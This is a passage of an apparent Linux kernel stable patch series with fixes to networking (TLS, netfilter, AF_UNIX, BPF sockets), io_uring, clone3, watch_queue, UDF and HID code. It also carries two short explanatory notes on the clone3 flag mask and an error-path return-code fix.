+@@ -438,7 +438,7 @@ static int udf_get_block(struct inode *inode, sector_t block,
+ 	 * Block beyond EOF and prealloc extents? Just discard preallocation
+ 	 * as it is not useful and complicates things.
+ 	 */
+-	if (((loff_t)block) << inode->i_blkbits > iinfo->i_lenExtents)
++	if (((loff_t)block) << inode->i_blkbits >= iinfo->i_lenExtents)
+ 		udf_discard_prealloc(inode);
+ 	udf_clear_extent_cache(inode);
+ 	phys = inode_getblk(inode, block, &err, &new);
+diff --git a/include/linux/hid.h b/include/linux/hid.h
+index 48563dc09e171..0a1ccc68e798a 100644
+--- a/include/linux/hid.h
++++ b/include/linux/hid.h
+@@ -827,6 +827,7 @@ struct hid_driver {
+  * @output_report: send output report to device
+  * @idle: send idle request to device
+  * @may_wakeup: return if device may act as a wakeup source during system-suspend
++ * @max_buffer_size: override the maximum data buffer size (default: HID_MAX_BUFFER_SIZE)
+  */
+ struct hid_ll_driver {
+ 	int (*start)(struct hid_device *hdev);
+@@ -852,6 +853,8 @@ struct hid_ll_driver {
+ 
+ 	int (*idle)(struct hid_device *hdev, int report, int idle, int reqtype);
+ 	bool (*may_wakeup)(struct hid_device *hdev);
++
++	unsigned int max_buffer_size;
+ };
+ 
+ extern struct hid_ll_driver i2c_hid_ll_driver;
+diff --git a/include/linux/mhi_ep.h b/include/linux/mhi_ep.h
+index 478aece170462..f198a8ac7ee72 100644
+--- a/include/linux/mhi_ep.h
++++ b/include/linux/mhi_ep.h
+@@ -70,8 +70,8 @@ struct mhi_ep_db_info {
+  * @cmd_ctx_cache_phys: Physical address of the host command context cache
+  * @chdb: Array of channel doorbell interrupt info
+  * @event_lock: Lock for protecting event rings
+- * @list_lock: Lock for protecting state transition and channel doorbell lists
+  * @state_lock: Lock for protecting state transitions
++ * @list_lock: Lock for protecting state transition and channel doorbell lists
+  * @st_transition_list: List of state transitions
+  * @ch_db_list: List of queued channel doorbells
+  * @wq: Dedicated workqueue for handling rings and state changes
+@@ -117,8 +117,8 @@ struct mhi_ep_cntrl {
+ 
+ 	struct mhi_ep_db_info chdb[4];
+ 	struct mutex event_lock;
++	struct mutex state_lock;
+ 	spinlock_t list_lock;
+-	spinlock_t state_lock;
+ 
+ 	struct list_head st_transition_list;
+ 	struct list_head ch_db_list;
+diff --git a/include/linux/pci_ids.h b/include/linux/pci_ids.h
+index bc8f484cdcf3b..45c3d62e616d8 100644
+--- a/include/linux/pci_ids.h
++++ b/include/linux/pci_ids.h
+@@ -3094,6 +3094,8 @@
+ 
+ #define PCI_VENDOR_ID_3COM_2		0xa727
+ 
++#define PCI_VENDOR_ID_SOLIDRUN		0xd063
++
+ #define PCI_VENDOR_ID_DIGIUM		0xd161
+ #define PCI_DEVICE_ID_DIGIUM_HFC4S	0xb410
+ 
+diff --git a/include/net/netfilter/nf_tproxy.h b/include/net/netfilter/nf_tproxy.h
+index 82d0e41b76f22..faa108b1ba675 100644
+--- a/include/net/netfilter/nf_tproxy.h
++++ b/include/net/netfilter/nf_tproxy.h
+@@ -17,6 +17,13 @@ static inline bool nf_tproxy_sk_is_transparent(struct sock *sk)
+ 	return false;
+ }
+ 
++static inline void nf_tproxy_twsk_deschedule_put(struct inet_timewait_sock *tw)
++{
++	local_bh_disable();
++	inet_twsk_deschedule_put(tw);
++	local_bh_enable();
++}
++
+ /* assign a socket to the skb -- consumes sk */
+ static inline void nf_tproxy_assign_sock(struct sk_buff *skb, struct sock *sk)
+ {
+diff --git a/io_uring/uring_cmd.c b/io_uring/uring_cmd.c
+index 446a189b78b03..2e4c483075d33 100644
+--- a/io_uring/uring_cmd.c
++++ b/io_uring/uring_cmd.c
+@@ -108,7 +108,7 @@ int io_uring_cmd(struct io_kiocb *req, unsigned int issue_flags)
+ 	struct file *file = req->file;
+ 	int ret;
+ 
+-	if (!req->file->f_op->uring_cmd)
++	if (!file->f_op->uring_cmd)
+ 		return -EOPNOTSUPP;
+ 
+ 	ret = security_uring_cmd(ioucmd);
+@@ -120,6 +120,8 @@ int io_uring_cmd(struct io_kiocb *req, unsigned int issue_flags)
+ 	if (ctx->flags & IORING_SETUP_CQE32)
+ 		issue_flags |= IO_URING_F_CQE32;
+ 	if (ctx->flags & IORING_SETUP_IOPOLL) {
++		if (!file->f_op->uring_cmd_iopoll)
++			return -EOPNOTSUPP;
+ 		issue_flags |= IO_URING_F_IOPOLL;
+ 		req->iopoll_completed = 0;
+ 		WRITE_ONCE(ioucmd->cookie, NULL);
+diff --git a/kernel/bpf/btf.c b/kernel/bpf/btf.c
+index 530e200fbc477..9880faa7e6760 100644
+--- a/kernel/bpf/btf.c
++++ b/kernel/bpf/btf.c
+@@ -4476,6 +4476,7 @@ static int btf_datasec_resolve(struct btf_verifier_env *env,
+ 	struct btf *btf = env->btf;
+ 	u16 i;
+ 
++	env->resolve_mode = RESOLVE_TBD;
+ 	for_each_vsi_from(i, v->next_member, v->t, vsi) {
+ 		u32 var_type_id = vsi->type, type_id, type_size = 0;
+ 		const struct btf_type *var_type = btf_type_by_id(env->btf,
+diff --git a/kernel/fork.c b/kernel/fork.c
+index 9f7fe35418978..8dd0127ddcb8d 100644
+--- a/kernel/fork.c
++++ b/kernel/fork.c
+@@ -2933,7 +2933,7 @@ static bool clone3_args_valid(struct kernel_clone_args *kargs)
+ 	 * - make the CLONE_DETACHED bit reusable for clone3
+ 	 * - make the CSIGNAL bits reusable for clone3
+ 	 */
+-	if (kargs->flags & (CLONE_DETACHED | CSIGNAL))
++	if (kargs->flags & (CLONE_DETACHED | (CSIGNAL & (~CLONE_NEWTIME))))
+ 		return false;
+ 
+ 	if ((kargs->flags & (CLONE_SIGHAND | CLONE_CLEAR_SIGHAND)) ==
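
The tightened mask works because CLONE_NEWTIME was assigned a bit inside the legacy CSIGNAL exit-signal field, so clone3 has to keep rejecting the CSIGNAL bits while still letting that one flag through. In bit terms (values from include/uapi/linux/sched.h):

	CSIGNAL                  = 0x000000ff
	CLONE_NEWTIME            = 0x00000080
	CSIGNAL & ~CLONE_NEWTIME = 0x0000007f	/* bits still rejected */
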
+diff --git a/kernel/watch_queue.c b/kernel/watch_queue.c
+index a6f9bdd956c39..f10f403104e7d 100644
+--- a/kernel/watch_queue.c
++++ b/kernel/watch_queue.c
+@@ -273,6 +273,7 @@ long watch_queue_set_size(struct pipe_inode_info *pipe, unsigned int nr_notes)
+ 	if (ret < 0)
+ 		goto error;
+ 
++	ret = -ENOMEM;
+ 	pages = kcalloc(sizeof(struct page *), nr_pages, GFP_KERNEL);
+ 	if (!pages)
+ 		goto error;
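
The added assignment fixes a classic error-path bug: after the preceding call succeeds, ret is 0, so a failed kcalloc() would jump to the error label and return success anyway. Setting the error code before each allocation keeps the goto-style exit path correct; schematically, with abbreviated names:

	ret = earlier_step();		/* ret == 0 on success */
	if (ret < 0)
		goto error;

	ret = -ENOMEM;			/* must precede the next failure check */
	pages = kcalloc(nr_pages, sizeof(*pages), GFP_KERNEL);
	if (!pages)
		goto error;
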
+diff --git a/net/caif/caif_usb.c b/net/caif/caif_usb.c
+index ebc202ffdd8d8..bf61ea4b8132d 100644
+--- a/net/caif/caif_usb.c
++++ b/net/caif/caif_usb.c
+@@ -134,6 +134,9 @@ static int cfusbl_device_notify(struct notifier_block *me, unsigned long what,
+ 	struct usb_device *usbdev;
+ 	int res;
+ 
++	if (what == NETDEV_UNREGISTER && dev->reg_state >= NETREG_UNREGISTERED)
++		return 0;
++
+ 	/* Check whether we have a NCM device, and find its VID/PID. */
+ 	if (!(dev->dev.parent && dev->dev.parent->driver &&
+ 	      strcmp(dev->dev.parent->driver->name, "cdc_ncm") == 0))
+diff --git a/net/core/sock.c b/net/core/sock.c
+index 63680f999bf6d..9796a5fa6ceaa 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -2827,7 +2827,8 @@ static void sk_enter_memory_pressure(struct sock *sk)
+ static void sk_leave_memory_pressure(struct sock *sk)
+ {
+ 	if (sk->sk_prot->leave_memory_pressure) {
+-		sk->sk_prot->leave_memory_pressure(sk);
++		INDIRECT_CALL_INET_1(sk->sk_prot->leave_memory_pressure,
++				     tcp_leave_memory_pressure, sk);
+ 	} else {
+ 		unsigned long *memory_pressure = sk->sk_prot->memory_pressure;
+ 
+diff --git a/net/ipv4/netfilter/nf_tproxy_ipv4.c b/net/ipv4/netfilter/nf_tproxy_ipv4.c
+index b22b2c745c76c..69e3317996043 100644
+--- a/net/ipv4/netfilter/nf_tproxy_ipv4.c
++++ b/net/ipv4/netfilter/nf_tproxy_ipv4.c
+@@ -38,7 +38,7 @@ nf_tproxy_handle_time_wait4(struct net *net, struct sk_buff *skb,
+ 					    hp->source, lport ? lport : hp->dest,
+ 					    skb->dev, NF_TPROXY_LOOKUP_LISTENER);
+ 		if (sk2) {
+-			inet_twsk_deschedule_put(inet_twsk(sk));
++			nf_tproxy_twsk_deschedule_put(inet_twsk(sk));
+ 			sk = sk2;
+ 		}
+ 	}
+diff --git a/net/ipv4/tcp_bpf.c b/net/ipv4/tcp_bpf.c
+index cf26d65ca3893..ebf9175119370 100644
+--- a/net/ipv4/tcp_bpf.c
++++ b/net/ipv4/tcp_bpf.c
+@@ -186,6 +186,9 @@ static int tcp_bpf_recvmsg_parser(struct sock *sk,
+ 	if (unlikely(flags & MSG_ERRQUEUE))
+ 		return inet_recv_error(sk, msg, len, addr_len);
+ 
++	if (!len)
++		return 0;
++
+ 	psock = sk_psock_get(sk);
+ 	if (unlikely(!psock))
+ 		return tcp_recvmsg(sk, msg, len, flags, addr_len);
+@@ -244,6 +247,9 @@ static int tcp_bpf_recvmsg(struct sock *sk, struct msghdr *msg, size_t len,
+ 	if (unlikely(flags & MSG_ERRQUEUE))
+ 		return inet_recv_error(sk, msg, len, addr_len);
+ 
++	if (!len)
++		return 0;
++
+ 	psock = sk_psock_get(sk);
+ 	if (unlikely(!psock))
+ 		return tcp_recvmsg(sk, msg, len, flags, addr_len);
+diff --git a/net/ipv4/udp_bpf.c b/net/ipv4/udp_bpf.c
+index e5dc91d0e0793..0735d820e413f 100644
+--- a/net/ipv4/udp_bpf.c
++++ b/net/ipv4/udp_bpf.c
+@@ -68,6 +68,9 @@ static int udp_bpf_recvmsg(struct sock *sk, struct msghdr *msg, size_t len,
+ 	if (unlikely(flags & MSG_ERRQUEUE))
+ 		return inet_recv_error(sk, msg, len, addr_len);
+ 
++	if (!len)
++		return 0;
++
+ 	psock = sk_psock_get(sk);
+ 	if (unlikely(!psock))
+ 		return sk_udp_recvmsg(sk, msg, len, flags, addr_len);
+diff --git a/net/ipv6/ila/ila_xlat.c b/net/ipv6/ila/ila_xlat.c
+index 47447f0241df6..bee45dfeb1874 100644
+--- a/net/ipv6/ila/ila_xlat.c
++++ b/net/ipv6/ila/ila_xlat.c
+@@ -477,6 +477,7 @@ int ila_xlat_nl_cmd_get_mapping(struct sk_buff *skb, struct genl_info *info)
+ 
+ 	rcu_read_lock();
+ 
++	ret = -ESRCH;
+ 	ila = ila_lookup_by_params(&xp, ilan);
+ 	if (ila) {
+ 		ret = ila_dump_info(ila,
+diff --git a/net/ipv6/netfilter/nf_tproxy_ipv6.c b/net/ipv6/netfilter/nf_tproxy_ipv6.c
+index 929502e51203b..52f828bb5a83d 100644
+--- a/net/ipv6/netfilter/nf_tproxy_ipv6.c
++++ b/net/ipv6/netfilter/nf_tproxy_ipv6.c
+@@ -63,7 +63,7 @@ nf_tproxy_handle_time_wait6(struct sk_buff *skb, int tproto, int thoff,
+ 					    lport ? lport : hp->dest,
+ 					    skb->dev, NF_TPROXY_LOOKUP_LISTENER);
+ 		if (sk2) {
+-			inet_twsk_deschedule_put(inet_twsk(sk));
++			nf_tproxy_twsk_deschedule_put(inet_twsk(sk));
+ 			sk = sk2;
+ 		}
+ 	}
+diff --git a/net/netfilter/nf_conntrack_core.c b/net/netfilter/nf_conntrack_core.c
+index ead11a9c261f3..19e3afb23fdaf 100644
+--- a/net/netfilter/nf_conntrack_core.c
++++ b/net/netfilter/nf_conntrack_core.c
+@@ -96,8 +96,8 @@ static DEFINE_MUTEX(nf_conntrack_mutex);
+ #define GC_SCAN_MAX_DURATION	msecs_to_jiffies(10)
+ #define GC_SCAN_EXPIRED_MAX	(64000u / HZ)
+ 
+-#define MIN_CHAINLEN	8u
+-#define MAX_CHAINLEN	(32u - MIN_CHAINLEN)
++#define MIN_CHAINLEN	50u
++#define MAX_CHAINLEN	(80u - MIN_CHAINLEN)
+ 
+ static struct conntrack_gc_work conntrack_gc_work;
+ 
+diff --git a/net/netfilter/nf_conntrack_netlink.c b/net/netfilter/nf_conntrack_netlink.c
+index 733bb56950c14..d095d3c1ceca6 100644
+--- a/net/netfilter/nf_conntrack_netlink.c
++++ b/net/netfilter/nf_conntrack_netlink.c
+@@ -328,11 +328,12 @@ nla_put_failure:
+ }
+ 
+ #ifdef CONFIG_NF_CONNTRACK_MARK
+-static int ctnetlink_dump_mark(struct sk_buff *skb, const struct nf_conn *ct)
++static int ctnetlink_dump_mark(struct sk_buff *skb, const struct nf_conn *ct,
++			       bool dump)
+ {
+ 	u32 mark = READ_ONCE(ct->mark);
+ 
+-	if (!mark)
++	if (!mark && !dump)
+ 		return 0;
+ 
+ 	if (nla_put_be32(skb, CTA_MARK, htonl(mark)))
+@@ -343,7 +344,7 @@ nla_put_failure:
+ 	return -1;
+ }
+ #else
+-#define ctnetlink_dump_mark(a, b) (0)
++#define ctnetlink_dump_mark(a, b, c) (0)
+ #endif
+ 
+ #ifdef CONFIG_NF_CONNTRACK_SECMARK
+@@ -548,7 +549,7 @@ static int ctnetlink_dump_extinfo(struct sk_buff *skb,
+ static int ctnetlink_dump_info(struct sk_buff *skb, struct nf_conn *ct)
+ {
+ 	if (ctnetlink_dump_status(skb, ct) < 0 ||
+-	    ctnetlink_dump_mark(skb, ct) < 0 ||
++	    ctnetlink_dump_mark(skb, ct, true) < 0 ||
+ 	    ctnetlink_dump_secctx(skb, ct) < 0 ||
+ 	    ctnetlink_dump_id(skb, ct) < 0 ||
+ 	    ctnetlink_dump_use(skb, ct) < 0 ||
+@@ -831,8 +832,7 @@ ctnetlink_conntrack_event(unsigned int events, const struct nf_ct_event *item)
+ 	}
+ 
+ #ifdef CONFIG_NF_CONNTRACK_MARK
+-	if (events & (1 << IPCT_MARK) &&
+-	    ctnetlink_dump_mark(skb, ct) < 0)
++	if (ctnetlink_dump_mark(skb, ct, events & (1 << IPCT_MARK)))
+ 		goto nla_put_failure;
+ #endif
+ 	nlmsg_end(skb, nlh);
+@@ -2735,7 +2735,7 @@ static int __ctnetlink_glue_build(struct sk_buff *skb, struct nf_conn *ct)
+ 		goto nla_put_failure;
+ 
+ #ifdef CONFIG_NF_CONNTRACK_MARK
+-	if (ctnetlink_dump_mark(skb, ct) < 0)
++	if (ctnetlink_dump_mark(skb, ct, true) < 0)
+ 		goto nla_put_failure;
+ #endif
+ 	if (ctnetlink_dump_labels(skb, ct) < 0)
+diff --git a/net/netfilter/nft_last.c b/net/netfilter/nft_last.c
+index 7f2bda6641bd8..8e6d7eaf9dc8b 100644
+--- a/net/netfilter/nft_last.c
++++ b/net/netfilter/nft_last.c
+@@ -105,11 +105,15 @@ static void nft_last_destroy(const struct nft_ctx *ctx,
+ static int nft_last_clone(struct nft_expr *dst, const struct nft_expr *src)
+ {
+ 	struct nft_last_priv *priv_dst = nft_expr_priv(dst);
++	struct nft_last_priv *priv_src = nft_expr_priv(src);
+ 
+ 	priv_dst->last = kzalloc(sizeof(*priv_dst->last), GFP_ATOMIC);
+ 	if (!priv_dst->last)
+ 		return -ENOMEM;
+ 
++	priv_dst->last->set = priv_src->last->set;
++	priv_dst->last->jiffies = priv_src->last->jiffies;
++
+ 	return 0;
+ }
+ 
+diff --git a/net/netfilter/nft_quota.c b/net/netfilter/nft_quota.c
+index 123578e289179..3ba12a7471b0f 100644
+--- a/net/netfilter/nft_quota.c
++++ b/net/netfilter/nft_quota.c
+@@ -236,12 +236,16 @@ static void nft_quota_destroy(const struct nft_ctx *ctx,
+ static int nft_quota_clone(struct nft_expr *dst, const struct nft_expr *src)
+ {
+ 	struct nft_quota *priv_dst = nft_expr_priv(dst);
++	struct nft_quota *priv_src = nft_expr_priv(src);
++
++	priv_dst->quota = priv_src->quota;
++	priv_dst->flags = priv_src->flags;
+ 
+ 	priv_dst->consumed = kmalloc(sizeof(*priv_dst->consumed), GFP_ATOMIC);
+ 	if (!priv_dst->consumed)
+ 		return -ENOMEM;
+ 
+-	atomic64_set(priv_dst->consumed, 0);
++	*priv_dst->consumed = *priv_src->consumed;
+ 
+ 	return 0;
+ }
+diff --git a/net/nfc/netlink.c b/net/nfc/netlink.c
+index 348bf561bc9fb..b9264e730fd93 100644
+--- a/net/nfc/netlink.c
++++ b/net/nfc/netlink.c
+@@ -1446,8 +1446,8 @@ static int nfc_se_io(struct nfc_dev *dev, u32 se_idx,
+ 	return rc;
+ 
+ error:
+-	kfree(cb_context);
+ 	device_unlock(&dev->dev);
++	kfree(cb_context);
+ 	return rc;
+ }
+ 
+diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
+index d9413d43b1045..e8018b0fb7676 100644
+--- a/net/smc/af_smc.c
++++ b/net/smc/af_smc.c
+@@ -2644,16 +2644,14 @@ static int smc_sendmsg(struct socket *sock, struct msghdr *msg, size_t len)
+ {
+ 	struct sock *sk = sock->sk;
+ 	struct smc_sock *smc;
+-	int rc = -EPIPE;
++	int rc;
+ 
+ 	smc = smc_sk(sk);
+ 	lock_sock(sk);
+-	if ((sk->sk_state != SMC_ACTIVE) &&
+-	    (sk->sk_state != SMC_APPCLOSEWAIT1) &&
+-	    (sk->sk_state != SMC_INIT))
+-		goto out;
+ 
++	/* SMC does not support connect with fastopen */
+ 	if (msg->msg_flags & MSG_FASTOPEN) {
++		/* not connected yet, fallback */
+ 		if (sk->sk_state == SMC_INIT && !smc->connect_nonblock) {
+ 			rc = smc_switch_to_fallback(smc, SMC_CLC_DECL_OPTUNSUPP);
+ 			if (rc)
+@@ -2662,6 +2660,11 @@ static int smc_sendmsg(struct socket *sock, struct msghdr *msg, size_t len)
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
++	} else if ((sk->sk_state != SMC_ACTIVE) &&
++		   (sk->sk_state != SMC_APPCLOSEWAIT1) &&
++		   (sk->sk_state != SMC_INIT)) {
++		rc = -EPIPE;
++		goto out;
+ 	}
+ 
+ 	if (smc->use_fallback) {
+diff --git a/net/sunrpc/svc.c b/net/sunrpc/svc.c
+index f06622814a958..7f9807374b0fb 100644
+--- a/net/sunrpc/svc.c
++++ b/net/sunrpc/svc.c
+@@ -786,6 +786,7 @@ svc_start_kthreads(struct svc_serv *serv, struct svc_pool *pool, int nrservs)
+ static int
+ svc_stop_kthreads(struct svc_serv *serv, struct svc_pool *pool, int nrservs)
+ {
++	struct svc_rqst	*rqstp;
+ 	struct task_struct *task;
+ 	unsigned int state = serv->sv_nrthreads-1;
+ 
+@@ -794,7 +795,10 @@ svc_stop_kthreads(struct svc_serv *serv, struct svc_pool *pool, int nrservs)
+ 		task = choose_victim(serv, pool, &state);
+ 		if (task == NULL)
+ 			break;
+-		kthread_stop(task);
++		rqstp = kthread_data(task);
++		/* Did we lose a race to svo_function threadfn? */
++		if (kthread_stop(task) == -EINTR)
++			svc_exit_thread(rqstp);
+ 		nrservs++;
+ 	} while (nrservs < 0);
+ 	return 0;
+diff --git a/net/tls/tls_device.c b/net/tls/tls_device.c
+index 6c593788dc250..a7cc4f9faac28 100644
+--- a/net/tls/tls_device.c
++++ b/net/tls/tls_device.c
+@@ -508,6 +508,8 @@ handle_error:
+ 			zc_pfrag.offset = iter_offset.offset;
+ 			zc_pfrag.size = copy;
+ 			tls_append_frag(record, &zc_pfrag, copy);
++
++			iter_offset.offset += copy;
+ 		} else if (copy) {
+ 			copy = min_t(size_t, copy, pfrag->size - pfrag->offset);
+ 
+diff --git a/net/tls/tls_main.c b/net/tls/tls_main.c
+index 3735cb00905df..b32c112984dd9 100644
+--- a/net/tls/tls_main.c
++++ b/net/tls/tls_main.c
+@@ -405,13 +405,11 @@ static int do_tls_getsockopt_conf(struct sock *sk, char __user *optval,
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
+-		lock_sock(sk);
+ 		memcpy(crypto_info_aes_gcm_128->iv,
+ 		       cctx->iv + TLS_CIPHER_AES_GCM_128_SALT_SIZE,
+ 		       TLS_CIPHER_AES_GCM_128_IV_SIZE);
+ 		memcpy(crypto_info_aes_gcm_128->rec_seq, cctx->rec_seq,
+ 		       TLS_CIPHER_AES_GCM_128_REC_SEQ_SIZE);
+-		release_sock(sk);
+ 		if (copy_to_user(optval,
+ 				 crypto_info_aes_gcm_128,
+ 				 sizeof(*crypto_info_aes_gcm_128)))
+@@ -429,13 +427,11 @@ static int do_tls_getsockopt_conf(struct sock *sk, char __user *optval,
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
+-		lock_sock(sk);
+ 		memcpy(crypto_info_aes_gcm_256->iv,
+ 		       cctx->iv + TLS_CIPHER_AES_GCM_256_SALT_SIZE,
+ 		       TLS_CIPHER_AES_GCM_256_IV_SIZE);
+ 		memcpy(crypto_info_aes_gcm_256->rec_seq, cctx->rec_seq,
+ 		       TLS_CIPHER_AES_GCM_256_REC_SEQ_SIZE);
+-		release_sock(sk);
+ 		if (copy_to_user(optval,
+ 				 crypto_info_aes_gcm_256,
+ 				 sizeof(*crypto_info_aes_gcm_256)))
+@@ -451,13 +447,11 @@ static int do_tls_getsockopt_conf(struct sock *sk, char __user *optval,
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
+-		lock_sock(sk);
+ 		memcpy(aes_ccm_128->iv,
+ 		       cctx->iv + TLS_CIPHER_AES_CCM_128_SALT_SIZE,
+ 		       TLS_CIPHER_AES_CCM_128_IV_SIZE);
+ 		memcpy(aes_ccm_128->rec_seq, cctx->rec_seq,
+ 		       TLS_CIPHER_AES_CCM_128_REC_SEQ_SIZE);
+-		release_sock(sk);
+ 		if (copy_to_user(optval, aes_ccm_128, sizeof(*aes_ccm_128)))
+ 			rc = -EFAULT;
+ 		break;
+@@ -472,13 +466,11 @@ static int do_tls_getsockopt_conf(struct sock *sk, char __user *optval,
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
+-		lock_sock(sk);
+ 		memcpy(chacha20_poly1305->iv,
+ 		       cctx->iv + TLS_CIPHER_CHACHA20_POLY1305_SALT_SIZE,
+ 		       TLS_CIPHER_CHACHA20_POLY1305_IV_SIZE);
+ 		memcpy(chacha20_poly1305->rec_seq, cctx->rec_seq,
+ 		       TLS_CIPHER_CHACHA20_POLY1305_REC_SEQ_SIZE);
+-		release_sock(sk);
+ 		if (copy_to_user(optval, chacha20_poly1305,
+ 				sizeof(*chacha20_poly1305)))
+ 			rc = -EFAULT;
+@@ -493,13 +485,11 @@ static int do_tls_getsockopt_conf(struct sock *sk, char __user *optval,
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
+-		lock_sock(sk);
+ 		memcpy(sm4_gcm_info->iv,
+ 		       cctx->iv + TLS_CIPHER_SM4_GCM_SALT_SIZE,
+ 		       TLS_CIPHER_SM4_GCM_IV_SIZE);
+ 		memcpy(sm4_gcm_info->rec_seq, cctx->rec_seq,
+ 		       TLS_CIPHER_SM4_GCM_REC_SEQ_SIZE);
+-		release_sock(sk);
+ 		if (copy_to_user(optval, sm4_gcm_info, sizeof(*sm4_gcm_info)))
+ 			rc = -EFAULT;
+ 		break;
+@@ -513,13 +503,11 @@ static int do_tls_getsockopt_conf(struct sock *sk, char __user *optval,
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
+-		lock_sock(sk);
+ 		memcpy(sm4_ccm_info->iv,
+ 		       cctx->iv + TLS_CIPHER_SM4_CCM_SALT_SIZE,
+ 		       TLS_CIPHER_SM4_CCM_IV_SIZE);
+ 		memcpy(sm4_ccm_info->rec_seq, cctx->rec_seq,
+ 		       TLS_CIPHER_SM4_CCM_REC_SEQ_SIZE);
+-		release_sock(sk);
+ 		if (copy_to_user(optval, sm4_ccm_info, sizeof(*sm4_ccm_info)))
+ 			rc = -EFAULT;
+ 		break;
+@@ -535,13 +523,11 @@ static int do_tls_getsockopt_conf(struct sock *sk, char __user *optval,
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
+-		lock_sock(sk);
+ 		memcpy(crypto_info_aria_gcm_128->iv,
+ 		       cctx->iv + TLS_CIPHER_ARIA_GCM_128_SALT_SIZE,
+ 		       TLS_CIPHER_ARIA_GCM_128_IV_SIZE);
+ 		memcpy(crypto_info_aria_gcm_128->rec_seq, cctx->rec_seq,
+ 		       TLS_CIPHER_ARIA_GCM_128_REC_SEQ_SIZE);
+-		release_sock(sk);
+ 		if (copy_to_user(optval,
+ 				 crypto_info_aria_gcm_128,
+ 				 sizeof(*crypto_info_aria_gcm_128)))
+@@ -559,13 +545,11 @@ static int do_tls_getsockopt_conf(struct sock *sk, char __user *optval,
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
+-		lock_sock(sk);
+ 		memcpy(crypto_info_aria_gcm_256->iv,
+ 		       cctx->iv + TLS_CIPHER_ARIA_GCM_256_SALT_SIZE,
+ 		       TLS_CIPHER_ARIA_GCM_256_IV_SIZE);
+ 		memcpy(crypto_info_aria_gcm_256->rec_seq, cctx->rec_seq,
+ 		       TLS_CIPHER_ARIA_GCM_256_REC_SEQ_SIZE);
+-		release_sock(sk);
+ 		if (copy_to_user(optval,
+ 				 crypto_info_aria_gcm_256,
+ 				 sizeof(*crypto_info_aria_gcm_256)))
+@@ -614,11 +598,9 @@ static int do_tls_getsockopt_no_pad(struct sock *sk, char __user *optval,
+ 	if (len < sizeof(value))
+ 		return -EINVAL;
+ 
+-	lock_sock(sk);
+ 	value = -EINVAL;
+ 	if (ctx->rx_conf == TLS_SW || ctx->rx_conf == TLS_HW)
+ 		value = ctx->rx_no_pad;
+-	release_sock(sk);
+ 	if (value < 0)
+ 		return value;
+ 
+@@ -635,6 +617,8 @@ static int do_tls_getsockopt(struct sock *sk, int optname,
+ {
+ 	int rc = 0;
+ 
++	lock_sock(sk);
++
+ 	switch (optname) {
+ 	case TLS_TX:
+ 	case TLS_RX:
+@@ -651,6 +635,9 @@ static int do_tls_getsockopt(struct sock *sk, int optname,
+ 		rc = -ENOPROTOOPT;
+ 		break;
+ 	}
++
++	release_sock(sk);
++
+ 	return rc;
+ }
+ 
+diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
+index 38dcd9b401027..992092aeebad9 100644
+--- a/net/tls/tls_sw.c
++++ b/net/tls/tls_sw.c
+@@ -2114,7 +2114,7 @@ recv_end:
+ 		else
+ 			err = process_rx_list(ctx, msg, &control, 0,
+ 					      async_copy_bytes, is_peek);
+-		decrypted = max(err, 0);
++		decrypted += max(err, 0);
+ 	}
+ 
+ 	copied += decrypted;
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index f0c2293f1d3b8..7d17601ceee79 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -2104,7 +2104,8 @@ out:
+ #define UNIX_SKB_FRAGS_SZ (PAGE_SIZE << get_order(32768))
+ 
+ #if IS_ENABLED(CONFIG_AF_UNIX_OOB)
+-static int queue_oob(struct socket *sock, struct msghdr *msg, struct sock *other)
++static int queue_oob(struct socket *sock, struct msghdr *msg, struct sock *other,
++		     struct scm_cookie *scm, bool fds_sent)
+ {
+ 	struct unix_sock *ousk = unix_sk(other);
+ 	struct sk_buff *skb;
+@@ -2115,6 +2116,11 @@ static int queue_oob(struct socket *sock, struct msghdr *msg, struct sock *other
+ 	if (!skb)
+ 		return err;
+ 
++	err = unix_scm_to_skb(scm, skb, !fds_sent);
++	if (err < 0) {
++		kfree_skb(skb);
++		return err;
++	}
+ 	skb_put(skb, 1);
+ 	err = skb_copy_datagram_from_iter(skb, 0, &msg->msg_iter, 1);
+ 
+@@ -2242,7 +2248,7 @@ static int unix_stream_sendmsg(struct socket *sock, struct msghdr *msg,
+ 
+ #if IS_ENABLED(CONFIG_AF_UNIX_OOB)
+ 	if (msg->msg_flags & MSG_OOB) {
+-		err = queue_oob(sock, msg, other);
++		err = queue_oob(sock, msg, other, &scm, fds_sent);
+ 		if (err)
+ 			goto out_err;
+ 		sent++;
+diff --git a/net/unix/unix_bpf.c b/net/unix/unix_bpf.c
+index e9bf155139612..2f9d8271c6ec7 100644
+--- a/net/unix/unix_bpf.c
++++ b/net/unix/unix_bpf.c
+@@ -54,6 +54,9 @@ static int unix_bpf_recvmsg(struct sock *sk, struct msghdr *msg,
+ 	struct sk_psock *psock;
+ 	int copied;
+ 
++	if (!len)
++		return 0;
++
+ 	psock = sk_psock_get(sk);
+ 	if (unlikely(!psock))
+ 		return __unix_recvmsg(sk, msg, len, flags);
+diff --git a/scripts/checkkconfigsymbols.py b/scripts/checkkconfigsymbols.py
+index 217d21abc86e8..36c920e713137 100755
+--- a/scripts/checkkconfigsymbols.py
++++ b/scripts/checkkconfigsymbols.py
+@@ -115,7 +115,7 @@ def parse_options():
+     return args
+ 
+ 
+-def main():
++def print_undefined_symbols():
+     """Main function of this module."""
+     args = parse_options()
+ 
+@@ -467,5 +467,16 @@ def parse_kconfig_file(kfile):
+     return defined, references
+ 
+ 
++def main():
++    try:
++        print_undefined_symbols()
++    except BrokenPipeError:
++        # Python flushes standard streams on exit; redirect remaining output
++        # to devnull to avoid another BrokenPipeError at shutdown
++        devnull = os.open(os.devnull, os.O_WRONLY)
++        os.dup2(devnull, sys.stdout.fileno())
++        sys.exit(1)  # Python exits with error code 1 on EPIPE
++
++
+ if __name__ == "__main__":
+     main()
+diff --git a/scripts/clang-tools/run-clang-tools.py b/scripts/clang-tools/run-clang-tools.py
